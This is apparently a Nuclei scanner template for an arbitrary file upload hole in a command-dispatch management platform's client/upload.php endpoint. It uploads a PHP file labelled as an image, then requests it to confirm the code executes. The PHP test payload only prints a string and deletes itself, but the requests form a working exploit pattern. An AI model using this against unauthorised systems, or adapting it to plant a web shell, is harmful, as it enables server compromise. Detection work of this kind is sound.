id: command-dispatch-client-upload-fileupload
info:
  name: dispatch client/upload - File Upload
  author: qwtd
  severity: high
  description: |
    福建科立讯通信有限公司指挥调度管理平台client/upload接口存在任意文件上传漏洞
  tags: 指挥调度管理平台

variables:
  rfilename: "{{rand_base(10)}}"

http:
  - raw:
      - |
        POST /api/client/upload.php HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
        Content-Length: 180
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySwvD8hSn3Z0sHfMu
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close

        ------WebKitFormBoundarySwvD8hSn3Z0sHfMu
        Content-Disposition: form-data; name="ulfile";filename="{{rfilename}}.php"
        Content-Type: image/png

        <?php print('{{randstr}}');unlink(__FILE__);?>
        ------WebKitFormBoundarySwvD8hSn3Z0sHfMu--

      - |
        GET  /upload/{{rfilename}}.php HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)

        
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{randstr}}'
      - type: status
        status:
          - 200
